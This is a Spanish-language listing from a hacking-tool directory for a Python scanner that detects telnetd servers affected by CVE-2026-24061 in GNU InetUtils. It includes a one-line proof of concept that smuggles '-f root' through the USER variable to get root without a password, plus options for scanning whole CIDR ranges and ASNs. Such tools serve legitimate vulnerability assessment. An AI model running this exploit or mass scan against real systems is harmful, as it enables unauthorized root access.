Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Twenty-Three-Scanner — CVE-2026-24061 - Omisión de autenticación remota en Telnetd de GNU InetUtils | Kitploit
Herramientas/GitHubGitHub/madfxr/twenty-three-scanner
ReconocimientoEscáneres de VulnerabilidadesExplotaciónRecopilación de InformaciónSeguridad de RedesPruebas de Penetración
GitHubmadfxr/twenty-three-scanner

Twenty-Three-Scanner

CVE-2026-24061 - Omisión de autenticación remota en Telnetd de GNU InetUtils

Ver Repositorio
421hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🛰️ Twenty-Three Scanner

Un escáner Potente, Rápido y Elegante para detectar servicios Telnetd vulnerables afectados por CVE-2026-24061. Construido con la biblioteca estándar pura de Python - cero dependencias externas requeridas.

License: MIT Python 3.x Android Windows macOS Solaris FreeBSD Linux Offensive Security Ethical Hacking CVE-2026-24061 GNU InetUtils Telnetd


🔗 Tabla de Contenidos

  • ⚖️ Licencia
  • 🧩 Características
  • ☣️ Detalles de la Vulnerabilidad
    • ⚡ Estado del Servicio
    • 🧪 Prueba de Concepto (PoC)
    • 💥 Versiones Afectadas
    • 🧵 Versiones Parcheadas
    • ⚔️ Vector de Ataque
    • 🚨 Puntuación CVSS
  • 🛠️ Instalación
  • 📜 Uso
  • 🎯 Ejemplos
  • ⚗️ Demostraciones
  • 📖 Referencias

🧩 Características

  • 🚀 Escaneo de Alto Rendimiento – Arquitectura Multi-Hilo con Número de Hilos Configurable.
  • 🌐 Entrada de Objetivos Flexible – Soporte para IPs Individuales, Rangos CIDR, Búsquedas ASN y Listas Basadas en Archivos.
  • 📊 Progreso en Tiempo Real – Interfaz Hermosa Basada en Unicode con Barras de Progreso en Vivo.
  • 🤖 Inteligencia ASN – Obtención Automática de Prefijos desde las APIs de RADB, BGPView y HackerTarget.
  • 🌍 Inteligencia de Ubicación Geográfica – Obtención en Tiempo Real de ASN, Proveedor y Ubicación desde la API de ipapi.
  • 💾 Interrupción Elegante – Manejo de CTRL+C con Guardado Automático de Resultados.
  • 📝 Registro Detallado – Niveles de Verbosidad Configurables para Depuración.
  • 🛡️ Escaneo Seguro – Límites Integrados para Prevenir Escaneos Masivos Accidentales.
  • 🎨 Salida Limpia – Tablas Profesionales con Bordes y Resúmenes de Escaneo.
  • 📦 Cero Dependencias – Solo Biblioteca Estándar Pura de Python 3.x.

☣️ Detalles de la Vulnerabilidad

CVE-2026-24061 es una vulnerabilidad crítica de omisión de autenticación en Telnetd de GNU InetUtils que permite a atacantes remotos no autenticados obtener acceso root explotando el manejo de la opción NEW-ENVIRON.


⚡ Estado del Servicio

El siguiente es el estado de configuración del servicio Telnetd en el lado del host objetivo.

image


🧪 Prueba de Concepto (PoC)

Y aquí está la Prueba de Concepto (PoC) para esta vulnerabilidad, que puede ejecutarse manualmente desde el host del atacante simplemente ejecutando el comando USER="-f root" telnet -a <TARGET_HOST> 23.

image


💥 Versiones Afectadas

  • GNU InetUtils >=1.9.3 <=2.7.
  • Varias distribuciones embebidas de Linux.
  • Dispositivos IoT con implementaciones vulnerables de Telnetd.

🧵 Versiones Parcheadas

  • GNU InetUtils >=2.8.

⚔️ Vector de Ataque

La vulnerabilidad explota la validación incorrecta de la variable de entorno USER en la negociación de la opción NEW-ENVIRON (RFC 1572) de telnet, permitiendo a los atacantes inyectar valores maliciosos como -f root para omitir la autenticación.


🚨 Puntuación CVSS

9.8 (Crítico) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.


🛠️ Instalación

# Clone the Repository
cd /opt
sudo git clone https://github.com/madfxr/Twenty-Three-Scanner.git
cd Twenty-Three-Scanner

# Make Executable
sudo chmod +x twenty-three-scanner.py

# Run the Script
sudo python3 twenty-three-scanner.py -h

📜 Uso

El siguiente es un manual para la herramienta Twenty-Three Scanner que puede usarse para detectar la vulnerabilidad CVE-2026-24061 - Omisión de Autenticación Remota en Telnetd de GNU InetUtils.

usage: python3 twenty-three-scanner.py [-h] [-t TARGET] [-f FILE] [-a ASN] [-p PORT] [--threads N] [--user-value VALUE] [--connect-timeout SEC] [--read-timeout SEC] [--id-timeout SEC]
                                       [--max-hosts-per-cidr N] [--max-total-hosts N] [--skip-large-networks] [-o FILE] [-v]

CVE-2026-24061 - GNU InetUtils Telnetd Remote Authentication Bypass

options:
  -h, --help            show this help message and exit

Target Options:
  -t TARGET, --target TARGET
                        target IP, CIDR, or comma-separated list (can be used multiple times)
  -f FILE, --file FILE  file containing targets (one per line, supports comments with #)
  -a ASN, --asn ASN     autonomous system number (e.g., AS10111 or 10111)

Scan Options:
  -p PORT, --port PORT  target port(s), comma-separated (default: 23)
  --threads N           number of concurrent threads (default: 50)
  --user-value VALUE    USER environment variable value for exploit (default: '-f root')
Descargar herramienta